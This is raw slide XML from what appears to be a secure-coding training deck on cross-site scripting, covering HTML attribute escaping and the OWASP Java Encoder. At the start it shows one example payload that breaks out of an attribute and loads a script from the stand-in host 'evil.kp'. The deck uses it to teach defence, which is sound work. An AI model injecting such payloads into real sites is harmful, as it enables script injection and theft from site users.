              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>evil.kp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;a id="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t> "&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6970003" y="457200"/>
            <a:ext cx="1716797" cy="1465129"/>
            <a:chOff x="6714321" y="635329"/>
            <a:chExt cx="1716797" cy="1465129"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="11" name="Group 10"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6835420" y="635329"/>
              <a:ext cx="1465134" cy="1465129"/>
              <a:chOff x="3285453" y="1431558"/>
              <a:chExt cx="1465134" cy="1465129"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17" name="Oval 16"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3285453" y="1431558"/>
                <a:ext cx="1465134" cy="1465129"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="38100" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="tx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p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3373277" y="1519470"/>
                <a:ext cx="1289487" cy="1289304"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="tx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16" name="TextBox 15"/>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HTML</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="416164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P spid="1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HTML Attribute Context</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="1832652"/>
            <a:ext cx="8686800" cy="707886"/>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Aggressive escaping is needed when placing</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>untrusted data into typical attribute values like width, name, value, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Group 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6970003" y="457200"/>
            <a:ext cx="1716797" cy="1465129"/>
            <a:chOff x="6714321" y="635329"/>
            <a:chExt cx="1716797" cy="1465129"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="22" name="Group 21"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6835420" y="635329"/>
              <a:ext cx="1465134" cy="1465129"/>
              <a:chOff x="3285453" y="1431558"/>
              <a:chExt cx="1465134" cy="1465129"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="Oval 26"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3285453" y="1431558"/>
                <a:ext cx="1465134" cy="1465129"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="38100" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="tx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p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3373277" y="1519470"/>
                <a:ext cx="1289487" cy="1289304"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="tx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6" name="TextBox 25"/>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HTML</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="2744432"/>
            <a:ext cx="8686800" cy="707886"/>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This rule is NOT ok for complex attributes likes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, style, or any event handlers like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onblur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="3656212"/>
            <a:ext cx="8686800" cy="400110"/>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Escape all non alpha-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>num</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t> characters with the &amp;#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xHH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; format</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="4260216"/>
            <a:ext cx="8686800" cy="707886"/>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This rule is so aggressive because developers frequently leave attributes unquoted</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="5171994"/>
            <a:ext cx="8686800" cy="400110"/>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rgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example of unquoted attribute: &lt;div id=DATA&gt;&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="68493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XSS?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7357" b="9930"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2648413" y="1066501"/>
            <a:ext cx="6510528" cy="5806440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="174145216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HTML Attribute Escaping Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1643601"/>
            <a:ext cx="8229052" cy="2717773"/>
            <a:chOff x="457200" y="3504779"/>
            <a:chExt cx="8229052" cy="2717773"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="Picture 13"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3" b="45313"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="3854128"/>
              <a:ext cx="8229052" cy="2368424"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Content Placeholder 4"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="790400" y="4213309"/>
              <a:ext cx="7895852" cy="1683859"/>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b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&lt;input type="text" name="data" value="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>UNTRUSTED</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>" /&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:endParaRPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&lt;td width="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>UNTRUSTED</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>" /&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:endParaRPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&lt;a href="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>UNTRUSTED</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>"&gt;The Link&lt;/a&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16"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HTML Attribute Escaping</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="Group 17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6970003" y="494999"/>
            <a:ext cx="1716797" cy="1465129"/>
            <a:chOff x="6714321" y="635329"/>
            <a:chExt cx="1716797" cy="1465129"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="19" name="Group 18"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6835420" y="635329"/>
              <a:ext cx="1465134" cy="1465129"/>
              <a:chOff x="3285453" y="1431558"/>
              <a:chExt cx="1465134" cy="1465129"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="21" name="Oval 20"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3285453" y="1431558"/>
                <a:ext cx="1465134" cy="1465129"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="38100" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="tx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p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3373277" y="1519470"/>
                <a:ext cx="1289487" cy="1289304"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="tx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0" name="TextBox 19"/>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HTML</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1141154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HTML Attribute Escaping Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1643601"/>
            <a:ext cx="8229052" cy="1995269"/>
            <a:chOff x="457200" y="3504779"/>
            <a:chExt cx="8229052" cy="1995269"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="Picture 13"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3" b="45313"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="3854128"/>
              <a:ext cx="8229052" cy="1645920"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Content Placeholder 4"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="790400" y="4044511"/>
              <a:ext cx="7895852" cy="1350113"/>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600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&lt;input type="text" name="data" </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>value="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&lt;%= </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" err="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>Encode.forHtmlAttribute</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>(UNTRUSTED) %&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>" /&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&lt;input type="text" name="data" </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>value=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&lt;%= </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" err="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>Encode.forHtmlUnquotedAttribute</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>(UNTRUSTED) %&gt; </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>/&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16"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OWASP Java Encoder</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="Group 17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6970003" y="494999"/>
            <a:ext cx="1716797" cy="1465129"/>
            <a:chOff x="6714321" y="635329"/>
            <a:chExt cx="1716797" cy="1465129"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="19" name="Group 18"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6835420" y="635329"/>
              <a:ext cx="1465134" cy="1465129"/>
              <a:chOff x="3285453" y="1431558"/>
              <a:chExt cx="1465134" cy="1465129"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="21" name="Oval 20"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3285453" y="1431558"/>
                <a:ext cx="1465134" cy="1465129"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
